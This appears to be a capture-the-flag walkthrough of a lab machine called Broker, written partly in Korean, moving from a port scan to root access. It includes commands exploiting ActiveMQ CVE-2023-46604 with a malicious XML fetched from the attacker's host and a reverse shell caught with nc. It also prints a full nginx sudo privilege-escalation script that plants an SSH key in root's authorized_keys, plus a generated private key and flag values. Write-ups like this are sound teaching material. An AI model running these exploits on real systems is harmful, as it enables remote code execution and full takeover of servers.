Proof of Concept

10.129.230.87

Nmap

PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
1883/tcp  open  mqtt
5672/tcp  open  amqp
8161/tcp  open  patrol-snmp
34591/tcp open  unknown
61613/tcp open  unknown
61614/tcp open  unknown
61616/tcp open  unknown

Initial Access

80포트 웹서비스 접근 시 로그인 창이 뜨며 admin/admin으로 로그인 가능

61616 포트로 접근 시 ActiveMQ 서비스 5.15.15 사용중인 것을 확인 가능

┌──(kali㉿kali)-[~/Broker]
└─$ nc 10.129.230.87 61616
<ActiveMQ
         *
          TcpNoDelayEnabledSizePrefixDisabled	CacheSize
                                                         ProviderName  ActiveMQStackTraceEnabledPlatformDetails	Java
                                                                                                                    CacheEnabledTightEncodingEnabled
                                                                                                                                                    MaxFrameSize@MaxInactivityDurationu0 MaxInactivityDurationInitalDelay'ProviderVersion	5.15.15

해당 서비스 버전에 RCE 취약점이 존재하는 것을 확인 (cve-2023-46604)

https://nvd.nist.gov/vuln/detail/cve-2023-46604

POC 다운로드

https://github.com/strikoder/CVE-2023-46604-ActiveMQ-RCE-Python

┌──(kali㉿kali)-[~/Broker]
└─$ git clone https://github.com/strikoder/CVE-2023-46604-ActiveMQ-RCE-Python.git
Cloning into 'CVE-2023-46604-ActiveMQ-RCE-Python'...
remote: Enumerating objects: 31, done.
remote: Counting objects: 100% (31/31), done.
remote: Compressing objects: 100% (26/26), done.
remote: Total 31 (delta 10), reused 12 (delta 3), pack-reused 0 (from 0)
Receiving objects: 100% (31/31), 1.65 MiB | 4.54 MiB/s, done.
Resolving deltas: 100% (10/10), done.

NC 리스너 실행

┌──(kali㉿kali)-[~/Broker]
└─$ rlwrap nc -nlvp 1001
listening on [any] 1001 ...

Generated the malicious XML file and started a simple HTTP server in the same folder (to serve the XML payload)

┌──(kali㉿kali)-[~/Broker/CVE-2023-46604-ActiveMQ-RCE-Python]
└─$ python3 generate_poc.py -i 10.10.14.248 -p 1001
[*] PoC XML written to poc-linux.xml
 
┌──(kali㉿kali)-[~/Broker/CVE-2023-46604-ActiveMQ-RCE-Python]
└─$ python -m http.server 2002
Serving HTTP on 0.0.0.0 port 2002 (http://0.0.0.0:2002/) ...

Executed exploit code

┌──(kali㉿kali)-[~/Broker/CVE-2023-46604-ActiveMQ-RCE-Python]
└─$ python main.py -i 10.129.230.87 -u http://10.10.14.248:2002/poc-linux.xml
 
     _        _   _           __  __  ___        ____   ____ _____
    / \   ___| |_(_)_   _____|  \/  |/ _ \      |  _ \ / ___| ____|
   / _ \ / __| __| \ \ / / _ \ |\/| | | | |_____| |_) | |   |  _|
  / ___ \ (__| |_| |\ V /  __/ |  | | |_| |_____|  _ <| |___| |___
 /_/   \_\___|\__|_| \_/ \___|_|  |_|\__\_\     |_| \_\\____|_____|
 
[*] Target: 10.129.230.87:61616
[*] XML URL: http://10.10.14.248:2002/poc-linux.xml
 
[*] Sending packet: 000000791f000000000000000000010100426f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e74657874010026687474703a2f2f31302e31302e31342e3234383a323030322f706f632d6c696e75782e786d6c

Successfully established reverse shell connection

┌──(kali㉿kali)-[~/Broker]
└─$ rlwrap nc -nlvp 1001
listening on [any] 1001 ...
connect to [10.10.14.248] from (UNKNOWN) [10.129.230.87] 45862
bash: cannot set terminal process group (878): Inappropriate ioctl for device
bash: no job control in this shell
activemq@broker:/opt/apache-activemq-5.15.15/bin$

Read user.txt

activemq@broker:~$ cat user.txt
cat user.txt
3503a76d733dc7c90b5112a68f9e8680
activemq@broker:~$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b0:83:99 brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    altname ens160
    inet 10.129.230.87/16 brd 10.129.255.255 scope global dynamic eth0
       valid_lft 2066sec preferred_lft 2066sec
    inet6 dead:beef::250:56ff:feb0:8399/64 scope global dynamic mngtmpaddr
       valid_lft 86400sec preferred_lft 14400sec
    inet6 fe80::250:56ff:feb0:8399/64 scope link
       valid_lft forever preferred_lft forever

Privilege Escalation

/usr/sbin/nginx에 대해 sudo 권한 보유한 것을 확인

activemq@broker:~$ sudo -l
sudo -l
Matching Defaults entries for activemq on broker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty
 
User activemq may run the following commands on broker:
    (ALL : ALL) NOPASSWD: /usr/sbin/nginx

nginx의 sudo 권한을 이용하여 권한 상승할 수 있는 익스플로잇 코드 작성

https://github.com/DylanGrl/nginx_sudo_privesc

#!/bin/sh
echo "[+] Creating configuration..."
cat << EOF > /tmp/nginx_pwn.conf
user root;
worker_processes 4;
pid /tmp/nginx.pid;
events {
        worker_connections 768;
}
http {
	server {
	        listen 1339;
	        root /;
	        autoindex on;
	        dav_methods PUT;
	}
}
EOF
echo "[+] Loading configuration..."
sudo nginx -c /tmp/nginx_pwn.conf
echo "[+] Generating SSH Key..."
ssh-keygen
echo "[+] Display SSH Private Key for copy..."
cat .ssh/id_rsa
echo "[+] Add key to root user..."
curl -X PUT localhost:1339/root/.ssh/authorized_keys -d "$(cat .ssh/id_rsa.pub)"
echo "[+] Use the SSH key to get access"

익스플로잇 코드를 실행하여 root로 로그인할 수 있는 SSH 키 생성

activemq@broker:~$ chmod a+x exploit.sh
chmod a+x exploit.sh
 
activemq@broker:~$ ./exploit.sh
./exploit.sh
[+] Creating configuration...
[+] Loading configuration...
nginx: [emerg] bind() to 0.0.0.0:1339 failed (98: Unknown error)
nginx: [emerg] bind() to 0.0.0.0:1339 failed (98: Unknown error)
nginx: [emerg] bind() to 0.0.0.0:1339 failed (98: Unknown error)
nginx: [emerg] bind() to 0.0.0.0:1339 failed (98: Unknown error)
nginx: [emerg] bind() to 0.0.0.0:1339 failed (98: Unknown error)
nginx: [emerg] still could not bind()
[+] Generating SSH Key...
Generating public/private rsa key pair.
Enter file in which to save the key (/home/activemq/.ssh/id_rsa):
Created directory '/home/activemq/.ssh'.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/activemq/.ssh/id_rsa
Your public key has been saved in /home/activemq/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:IDVLuAmjCPAldslFSNlY0nnuUJnYNRe8N9jvApAdfSw activemq@broker
The key's randomart image is:
+---[RSA 3072]----+
|o oo=%B+ +o.oo . |
|.oo+B+=o*  oo E o|
|o..o.oo+   o = o |
|o   o.... o + +  |
|       oS  . . o |
|        .   .   .|
|             . . |
|              . .|
|               . |
+----[SHA256]-----+
[+] Display SSH Private Key for copy...
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
[+] Add key to root user...
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   568    0     0  100   568      0   435k --:--:-- --:--:-- --:--:--  554k
[+] Use the SSH key to get access

생성한 SSH 키를 이용하여 root로 SSH 접속

┌──(kali㉿kali)-[~/Broker]
└─$ ssh -i id_rsa root@10.129.230.87
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-88-generic x86_64)
 
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
 
  System information as of Thu Feb 12 12:53:09 PM UTC 2026
 
  System load:           0.0
  Usage of /:            70.6% of 4.63GB
  Memory usage:          11%
  Swap usage:            0%
  Processes:             158
  Users logged in:       0
  IPv4 address for eth0: 10.129.230.87
  IPv6 address for eth0: dead:beef::250:56ff:feb0:8399
 
 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.
 
   https://ubuntu.com/engage/secure-kubernetes-at-the-edge
 
Expanded Security Maintenance for Applications is not enabled.
 
0 updates can be applied immediately.
 
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
 
 
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
 
root@broker:~#

Read root.txt

root@broker:~# cat root.txt
ae1d9eeb0d8ed8abd6484d05ab09480d
root@broker:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b0:83:99 brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    altname ens160
    inet 10.129.230.87/16 brd 10.129.255.255 scope global dynamic eth0
       valid_lft 2888sec preferred_lft 2888sec
    inet6 dead:beef::250:56ff:feb0:8399/64 scope global dynamic mngtmpaddr
       valid_lft 86400sec preferred_lft 14400sec
    inet6 fe80::250:56ff:feb0:8399/64 scope link
       valid_lft forever preferred_lft forever

KalioNix

Explorer

Broker

Proof of Concept

10.129.230.87

Nmap

Initial Access

Privilege Escalation

Table of Contents